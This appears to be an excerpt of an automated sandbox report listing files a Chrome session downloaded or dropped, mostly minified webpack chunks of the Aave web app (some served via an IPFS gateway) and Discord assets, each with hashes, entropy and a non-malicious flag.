                                                                                                                                                                                                                                                  Size (bytes):34035
                                                                                                                                                                                                                                                  Entropy (8bit):5.45683293617562
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:knedWIxaY317y9J99yHCikU07Lq8anawf59Gq5n0Zzg9ffbNabNA:zd3G9J99yHCikpBaFf59Gm05g93hahA
                                                                                                                                                                                                                                                  MD5:AECC04844654567A03351C63FD7CA85F
                                                                                                                                                                                                                                                  SHA1:AFC31A40013EBFB721E43B2DB2BC7AD7DEA5E017
                                                                                                                                                                                                                                                  SHA-256:2DF57BA0E64B13AB4CCD34B721A09FE19992BCAAA8E6F6B26A1FDBA704C813BA
                                                                                                                                                                                                                                                  SHA-512:FEE7DF961170289BD3F9CA2F0AA2B874B78DCBBEFD1875553705CF210369E8B7167342EAE05FE5943903D923A6BE798F70AFDE46B6927664DFD70717A5BB2C57
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/3866.777e7d128e9a4375.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3866],{50020:function(e,r,t){var n=t(59499),o=t(4730),a=t(91655),i=t(30120),s=t(29630),c=(t(67294),t(73965)),l=t(41024),u=t(85893),d=["minVal","maxVal","percentVariant","hyphenVariant"];function p(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);r&&(n=n.filter((function(r){return Object.getOwnPropertyDescriptor(e,r).enumerable}))),t.push.apply(t,n)}return t}function x(e){for(var r=1;r<arguments.length;r++){var t=null!=arguments[r]?arguments[r]:{};r%2?p(Object(t),!0).forEach((function(r){(0,n.Z)(e,r,t[r])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(t)):p(Object(t)).forEach((function(r){Object.defineProperty(e,r,Object.getOwnPropertyDescriptor(t,r))}))}return e}r.Z=function(e){var r=e.minVal,t=e.maxVal,n=e.percentVariant,p=e.hyphenVariant,m=(0,o.Z)(e,d),v=(0,c.HT)(),b=v.ghoLoadingData,h=v.ghoReserveData;if(b)return(0,u.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):395
                                                                                                                                                                                                                                                  Entropy (8bit):4.646873794844198
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:6:tnrVzUOtumc4slvIl4slvUldboLYPsd9IZI0OuFxMdIr0a/NdpVo4a38n:trVzNtuCHvOdELYPsuI09z9LdYr38n
                                                                                                                                                                                                                                                  MD5:E843C51C0EEC3801B70CAE5C45AD343F
                                                                                                                                                                                                                                                  SHA1:AD735360ECFA829DB9D6C48F1A671A99BFCE1D2A
                                                                                                                                                                                                                                                  SHA-256:F860149A77A53D43396F3AEC9377B9A0DD6C5D84459079C5D393F6343EC253FB
                                                                                                                                                                                                                                                  SHA-512:2AF4816580FD02A2AE107914D967AF966CA97E137434E2668C7A430D34168E150F668AE3A3B005BFF7070D50A0FD89BD0B5A351F5E3DB6F6B167998378308F71
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/410a2166a48c9e482e2a.svg
                                                                                                                                                                                                                                                  Preview:<svg width="12" height="12" viewBox="0 0 12 12" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M2.9932 7.49727C5.48073 7.49727 7.49727 5.48073 7.49727 2.9932C7.49727 1.84421 7.06704 0.795708 6.35889 0C9.50595 0.188323 12 2.80018 12 5.99456C12 9.31127 9.31127 12 5.99456 12C2.80018 12 0.188323 9.50595 0 6.35889C0.795708 7.06704 1.84421 7.49727 2.9932 7.49727Z" fill="#FFFFFF"/>.</svg>.
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (27868), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):27868
                                                                                                                                                                                                                                                  Entropy (8bit):5.4866264097941295
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:yyPyWVecfOYV3HFQ/AomIkhCsePNb5TrgbFPB:ReTO2tkhCbNK
                                                                                                                                                                                                                                                  MD5:18837DE2BB5281AD931EC916147321DF
                                                                                                                                                                                                                                                  SHA1:D5CFF8DA53DE054E81B4785FDC683378EB099125
                                                                                                                                                                                                                                                  SHA-256:D132602004CD9FDFD5C08830FD3C506EC1FEBEB503651F042EF9F73518C54704
                                                                                                                                                                                                                                                  SHA-512:786C20EDD8B59BD32BF9FB7F96EDB063FD8AC9522997F908068B0E5AEC34BD81B8B43326E740EA5B9CF101B8BEF2026E8E965B1F3C8F3F3D5DC1581A5B25E906
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/102.0286c0488e0d6096.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[102],{62753:function(e,n,t){var r=t(64836);n.Z=void 0;var o=r(t(64938)),i=t(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");n.Z=a},96875:function(e,n,t){t.d(n,{o:function(){return j}});var r=t(59499),o=t(4730),i=t(49501),a=t(1279),s=t(62097),c=t(30120),l=t(29630),d=t(75084),u=t(70794),x=t(41024),p=t(85893),m=["value","onInfoClick","HALIntegrationComponent"];function f(e,n){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);n&&(r=r.filter((function(n){return Object.getOwnPropertyDescriptor(e,n).enumerable})))
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (16091), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):16091
                                                                                                                                                                                                                                                  Entropy (8bit):5.521707777427411
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:bYaVPtiKrVPKyXRZ016I8m+EKlDvtpgvYdMixYQuRI7bKNJjZUuI0349Ez0hV:kytiAkgRDlpgvYp1uRI7OzFUuD349EU
                                                                                                                                                                                                                                                  MD5:9E29B53E7682A0F7CB1876DD826FBCBF
                                                                                                                                                                                                                                                  SHA1:2E4259B5817F72A2831CD316BE820DDE2905552D
                                                                                                                                                                                                                                                  SHA-256:7A55DBBCF7FC87BF9D71F04C3C7498BA40B88ACFB273C854E30413B4A387C332
                                                                                                                                                                                                                                                  SHA-512:52E5AEE042E7EECF79CABAF417B78C8EC01E840AC730876FD7E9D471160D532D8E19A6AF8687A1B280EDFE9E2F9F57AA108129FCA3FBC562FB48F274098AC741
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/5903-60cd3e3225910723.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5903],{40535:function(e,t,r){r.d(t,{V:function(){return b}});var n=r(49501),o=r(62097),i=r(61225),s=r(30120),a=r(29630),l=r(75084),c=r(78371),u=r(67728),d=r(25563),p=r(68861),x=r(85893),b=function(e){var t=e.pageTitle,r=e.withMarketSwitcher,b=e.withMigrateButton,f=(0,c.Y)((function(e){return(0,u.lY)(e)})),h=(0,o.Z)(),m=(0,i.Z)(h.breakpoints.up("lg")),y=(0,i.Z)(h.breakpoints.down("xsm"));return(0,x.jsxs)(s.Z,{sx:{display:"flex",alignItems:{xs:"flex-start",xsm:"center"},mb:t?4:0,flexDirection:{xs:"column",xsm:"row"}},children:[t&&(y||!r)&&(0,x.jsx)(s.Z,{sx:{display:"flex",alignItems:"flex-start"},children:(0,x.jsx)(a.Z,{variant:y?"h2":m?"display1":"h1",sx:{color:r?"text.muted":"text.white",mr:{xs:5,xsm:3},mb:{xs:1,xsm:0}},children:t})}),(0,x.jsxs)(s.Z,{sx:{display:"flex",alignItems:"flex-start",flexWrap:"wrap",mb:t?0:4},children:[r&&(0,x.jsx)(d.tF,{}),f&&b&&(0,x.jsx)(p.rU,{href:p.Z6.migrationTool,sx:{mt:{xs:2,xsm:0}},c
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (45796), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):45796
                                                                                                                                                                                                                                                  Entropy (8bit):5.584146002898277
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:GbemM3hCsH315rbDOniVUMwsSKCzTXjGNiW5PdvUqv98oU7HNfXBU:GQ3hCk31ZWusXjGNiWpdvUqvyu
                                                                                                                                                                                                                                                  MD5:BE66FA90507264B8B852114B1FA37B88
                                                                                                                                                                                                                                                  SHA1:5F09073CC9CAAF14EBED72C216462CBCC171E62B
                                                                                                                                                                                                                                                  SHA-256:678D80EC1689AAB4A646FB49FC0AA2BEB621DEE21D28708309ABBB9CD4263252
                                                                                                                                                                                                                                                  SHA-512:992C77EE1FC3C03071E4F13108A86AA1A288EB4D8D9CB14AB66EB950985C7C025BA8E6D4B90746FAE90855AD3C387EE906977FED11A667B25BEFC27588F304B9
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/1367.e6cb3b6253483840.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1367],{50020:function(e,t,r){var n=r(59499),o=r(4730),a=r(91655),i=r(30120),s=r(29630),l=(r(67294),r(46839)),c=r(41024),u=r(85893),d=["minVal","maxVal","percentVariant","hyphenVariant"];function p(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function b(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?p(Object(r),!0).forEach((function(t){(0,n.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):p(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}t.Z=function(e){var t=e.minVal,r=e.maxVal,n=e.percentVariant,p=e.hyphenVariant,x=(0,o.Z)(e,d),h=(0,l.HT)(),f=h.ghoLoadingData,v=h.ghoReserveData;if(f)return(0,u.js
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (9319)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):9368
                                                                                                                                                                                                                                                  Entropy (8bit):5.517406162410664
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:i5FOdCCCb5Ui4C5wOjggHurX0W89VSIFIUpSpWgAUcnNyeVjAZ2dQTK0ne+6ACuR:iSbuIAr3gKYa48OwaU7PQDFRtQq
                                                                                                                                                                                                                                                  MD5:CBFFDA44430EA3BA1E3B5C0E015FC252
                                                                                                                                                                                                                                                  SHA1:1772AC715EC2F25ECEF0CC4A86A5C3737D2D972B
                                                                                                                                                                                                                                                  SHA-256:E9AE87D055719672140711F121B4B13AF030681D9512FC358226006DB77226F9
                                                                                                                                                                                                                                                  SHA-512:0A3B42AB87CB4748288940E5F85FDC277EEF071BA3494A4849916333FE22468DB8515BFE976C100471400315843BA1EA337AB20FBA49ADAB773E6ED21EF09124
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/83715ab23647c1be8510.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["84956"],{986197:function(e,t,n){var i=n(990547),o=n(544891),a=n(570140),s=n(881052),r=n(626135),u=n(573261),l=n(545851),g=n(109488),d=n(794099),c=n(981631),m=n(689938);n(135200);t.Z={resetSuggestions:()=>a.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"}),async fetchSuggestionsRegistration(e){let t=arguments.length>1&&void 0!==arguments[1]?arguments[1]:1500;if(!!(0,d.vc)()){a.Z.dispatch({type:"POMELO_SUGGESTIONS_RESET"});try{var n;let i=await o.tn.get({url:c.ANM.POMELO_SUGGESTIONS_UNAUTHED,query:null==e?void 0:{global_name:e},timeout:t});if(i.ok&&(null===(n=i.body)||void 0===n?void 0:n.username)!=null)return a.Z.dispatch({type:"POMELO_REGISTRATION_SUGGESTIONS_SUCCESS",suggestion:i.body,source:e})}catch(e){return}}},async fetchSuggestions(e){if(!!(0,g.P)())try{var t;a.Z.dispatch({type:"POMELO_SUGGESTIONS_FETCH",usernameSuggestionLoading:!0});let n=await o.tn.get({url:c.ANM.POMELO_SUGGESTIONS,timeout:e});if(
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5601
                                                                                                                                                                                                                                                  Entropy (8bit):5.766045335838852
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:2XobeWKBub3kiJfaaLUmbybQSfuaVRbm0HMgFfgWuAyEdVAmefr4/8VZPUGkzO:qobtfaa9DSfXDbXMaYPAyEdLefr4/YM2
                                                                                                                                                                                                                                                  MD5:80CACAFAA49067CFB1EF6FD5FC4C898A
                                                                                                                                                                                                                                                  SHA1:3AFCC6ED3A5061D360C7DF946E28485BC5501E6D
                                                                                                                                                                                                                                                  SHA-256:00684B88EC54BE084E748334043FB772B14226404BAE8F54849A2E127581C44D
                                                                                                                                                                                                                                                  SHA-512:368F192E203627292F9EE4E6667FEF7EB63E2ADA5AD61EEFF7D79882685098793B5482433ABD0CC2726C9B8418AFC3F8C34871478CE88900BE3DD782D98AD2CF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["46369"],{438820:function(e,t,n){var i,a=n(442837),c=n(570140);function o(e,t,n){return t in e?Object.defineProperty(e,t,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[t]=n,e}let s={canPlayWowMoment:!1,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null};class d extends(i=a.ZP.PersistedStore){initialize(e){null!=e&&(s=e),s.canPlayWowMoment=!1,s.isFetchingWowMomentMedia=!1,s.wowMomentWumpusMediaUrl=null}getState(){return s}get canPlayWowMoment(){return s.canPlayWowMoment}get isFetchingWowMomentMedia(){return s.isFetchingWowMomentMedia}get wowMomentWumpusMedia(){return s.wowMomentWumpusMediaUrl}}o(d,"displayName","PurchasedItemsFestivityStore"),o(d,"persistKey","PurchasedItemsFestivityStore"),o(d,"migrations",[e=>({...e})]),t.Z=new d(c.Z,{LOGOUT:function(){s={canPlayWowMoment:!1,isFetchingWowMomentMedia:!1,wowMomentWumpusMediaUrl:null}},PURCHASED_ITEMS_FESTIVITY_SET_CAN_PLAY_WOW_MOMENT:functi
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):28
                                                                                                                                                                                                                                                  Entropy (8bit):3.950212064914748
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:3:WZoS8/ZYn:WZoS8/ZYn
                                                                                                                                                                                                                                                  MD5:C3F64CB2A8B00CBBC30CE2908208A29D
                                                                                                                                                                                                                                                  SHA1:E4AA7CAB67F4CF5FA52371DDC25A75AAFD4D0CCC
                                                                                                                                                                                                                                                  SHA-256:391601283994BCD9486160BF8A5637410D280E1BDDD3AEF5428454976E193E81
                                                                                                                                                                                                                                                  SHA-512:6CCBC26128FE65D6D313B965DA3D2E201D506442D0036404ABB490BE0FC99B3A0FDB611269B932DBA7F3A621E11F79ED213D2B11D487EE39C54A17D97A823552
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwl_UOxgaJ_DSxIFDZFhlU4SBQ2RYZVO?alt=proto
                                                                                                                                                                                                                                                  Preview:ChIKBw2RYZVOGgAKBw2RYZVOGgA=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5383), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):5383
                                                                                                                                                                                                                                                  Entropy (8bit):5.407192806801637
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:7g7XsxinWZT77nX2SdAxCc5j0AgRI3pSgXpSgkVQZ/clfA/bBckwOZOX0C+38y:e8xiWl77nXndAxCc5gAfdkVQNclfA/bx
                                                                                                                                                                                                                                                  MD5:A906457543407A440EEB7CEFF65CE2C5
                                                                                                                                                                                                                                                  SHA1:C703D13449CEBAE2CD8BB494877CE8FB89915870
                                                                                                                                                                                                                                                  SHA-256:D015C44415D90338A85BFB03F14DC97DA33980E85DC27EDFFF46D47BEA0C53E6
                                                                                                                                                                                                                                                  SHA-512:650A6B576F52A4C6A8C8DC3482DF7B94CAB3FF97F4D5B6E95C7A3C5FE9359061CE6B2656D68D2D055746DAE830E48599A8FE19ED6B09F90D516DA66951437746
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9072],{79072:function(e,n,t){t.d(n,{ZP:function(){return N}});var r=t(63366),i=t(87462),o=t(67294),a=t(86010),s=t(95408),c=t(39707),p=t(94780),u=t(81719),l=t(78884),m=t(62097);var d=o.createContext(),f=t(34867);function g(e){return(0,f.Z)("MuiGrid",e)}const w=["auto",!0,1,2,3,4,5,6,7,8,9,10,11,12];var h=(0,t(1588).Z)("MuiGrid",["root","container","item","zeroMinWidth",...[0,1,2,3,4,5,6,7,8,9,10].map((e=>`spacing-xs-${e}`)),...["column-reverse","column","row-reverse","row"].map((e=>`direction-xs-${e}`)),...["nowrap","wrap-reverse","wrap"].map((e=>`wrap-xs-${e}`)),...w.map((e=>`grid-xs-${e}`)),...w.map((e=>`grid-sm-${e}`)),...w.map((e=>`grid-md-${e}`)),...w.map((e=>`grid-lg-${e}`)),...w.map((e=>`grid-xl-${e}`))]),x=t(85893);const b=["className","columns","columnSpacing","component","container","direction","item","rowSpacing","spacing","wrap","zeroMinWidth"];function $(e){const n=parseFloat(e);return`${n}${String(e).rep
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (18405), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):18405
                                                                                                                                                                                                                                                  Entropy (8bit):5.439761220620952
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:192:2f41yRfPreQYWW+rFNfCpXxRMvQUbsMpAPX5Qz2U86tEIGmcpDdql+JxPziABTkF:JvWPrjC55gAPpMZ8P+SkJ1so
                                                                                                                                                                                                                                                  MD5:A8940D40A47213A0BEEEC5FF547A0954
                                                                                                                                                                                                                                                  SHA1:D09AB9E6D669255C061EB3AE67618EA39207B160
                                                                                                                                                                                                                                                  SHA-256:1F6A8DDDFF1226DEEFB521E86F91C16D5FDFA9BF82C178F4EDC89FD104A150E2
                                                                                                                                                                                                                                                  SHA-512:14A94F43E01AE6BE2CA0381F78E5972C74B33FE8570F711D56E670217F93FD9C1504684488E3BA042ABFE6881A86BA1F8719D4498094BAAF5115A6FBEF033A1B
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/chunks/4254-a9fee39d0c27297f.js
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4254],{35643:function(e,t,r){r.d(t,{g:function(){return D}});var n=r(17674),a=r(80854),i=r(1279),o=r(62753),s=r(9144),c=r(30120),u=r(90149),l=r(56371),d=r(67294),p=r(59499),f=r(36864),v=r(49501),x=r(57609),h=r(58527),b=r(85893);function g(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,n)}return r}function m(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?g(Object(r),!0).forEach((function(t){(0,p.Z)(e,t,r[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):g(Object(r)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(r,t))}))}return e}var y=function(e){var t=(0,f.Z)({},e);return(0,b.jsx)(h.G,m(m({event:{eventName:x.vh.TOOL_TIP,eventParams:{tooltip:"Gas C
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (40104), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40104
                                                                                                                                                                                                                                                  Entropy (8bit):5.52276425201366
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:ZyPKeF+pHuVecXWp+K8FPTmHNhCsmb1rth+Hbx5yh/KjnTKbQ:Xr4ezEWNhC71A
                                                                                                                                                                                                                                                  MD5:1C85DC354F6107073E9F7EA45BE17BF8
                                                                                                                                                                                                                                                  SHA1:732FEE8E415A3AE05ED3EF8476ED02C30F3D0DC2
                                                                                                                                                                                                                                                  SHA-256:4D4AAD34AF0F6B17306CCCC1BDA3E49A276AACE7E8839EA7498E153C1B5E0DE7
                                                                                                                                                                                                                                                  SHA-512:84C0A4A5A99F9D6B8899020A1D5EE75631948799C343F93CB340303B92A839309E3327BAD3DD65E761016FE66E59705D4426CEC0F31216B81DA5F4341D63F6C5
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9522],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),a=n(85893),i=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=i},89722:function(e,t,n){n.d(t,{Z:function(){return h}});var r=n(87462),o=n(63366),a=n(67294),i=n(86010),s=n(94780),c=n(81719),l=n(78884),u=n(36622),d=n(34867);function p(e){return(0,d.Z)("MuiIcon",e)}(0,n(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var m=n(85893);const f=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (36944), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):36944
                                                                                                                                                                                                                                                  Entropy (8bit):4.339531441659292
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:384:7tzFf8wXDlyklTD+IxPNCg52LWR0Y4QD+2tq+9kg4L6hWXPyJ7s62DnjVVtJ/V3a:RzFbXdlxPNCO2LWqHQDIm0/y5SDnjbs
                                                                                                                                                                                                                                                  MD5:C6B77C13893CC787E7115D4FC7998E77
                                                                                                                                                                                                                                                  SHA1:DAD08C4D833D7C5268D467BEF0782F4645AEB491
                                                                                                                                                                                                                                                  SHA-256:4F166C03F8C6AD6060636D4D24154A0BD8511EA14CEF8195AB65D77173AD8D23
                                                                                                                                                                                                                                                  SHA-512:8741587FF9E77E765BF6AB94485DDC30BAFDB2F79904F66E58240CFA28FD89D8E319301188A3203DCD8CBE5FF1687917BE01B99227D29689F4F03052913CE978
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5599],{5209:function(a,c,e){var t,l,n,r,i,s,o=e(67294);function f(){return f=Object.assign?Object.assign.bind():function(a){for(var c=1;c<arguments.length;c++){var e=arguments[c];for(var t in e)Object.prototype.hasOwnProperty.call(e,t)&&(a[t]=e[t])}return a},f.apply(this,arguments)}c.Z=function(a){return o.createElement("svg",f({width:135,height:163,viewBox:"0 0 135 163",fill:"none",xmlns:"http://www.w3.org/2000/svg"},a),o.createElement("g",{clipPath:"url(#loveGhost_svg__a)"},t||(t=o.createElement("circle",{cx:67.788,cy:95.034,r:66.078,transform:"rotate(19.923 67.788 95.034)",fill:"url(#loveGhost_svg__b)",stroke:"#000"})),o.createElement("mask",{id:"loveGhost_svg__c",style:{maskType:"alpha"},maskUnits:"userSpaceOnUse",x:2,y:29,width:132,height:132},l||(l=o.createElement("circle",{cx:67.786,cy:95.035,r:65.578,transform:"rotate(19.923 67.786 95.035)",fill:"#fff"}))),n||(n=o.createElement("g",{mask:"url(#loveGhost_svg__
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (57798), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):57798
                                                                                                                                                                                                                                                  Entropy (8bit):5.385619029897784
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:iuouiX+1WSo5TfVPmyeQ65iDDxSrGcMdzbr:JsX+sS/XGcuH
                                                                                                                                                                                                                                                  MD5:7B2A187D5E390CE807486F4DB9D96904
                                                                                                                                                                                                                                                  SHA1:9B13E633633954E9EB30B1AFDFB240DFC7DF90B6
                                                                                                                                                                                                                                                  SHA-256:B21AF8B13F6A9CB0A90C43DA127BD9CC46041DF394B4195DD2AD9B5F676576B1
                                                                                                                                                                                                                                                  SHA-512:F66CF63A1BD344A85C2C3C840C0523886E7F097C9724D485966BC73A71D1303A1AA4A7249F90388DC61246729EEA080792AB92F50BFA9CCB2D4B31CE72A0878A
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/7091-73091706560db88e.js
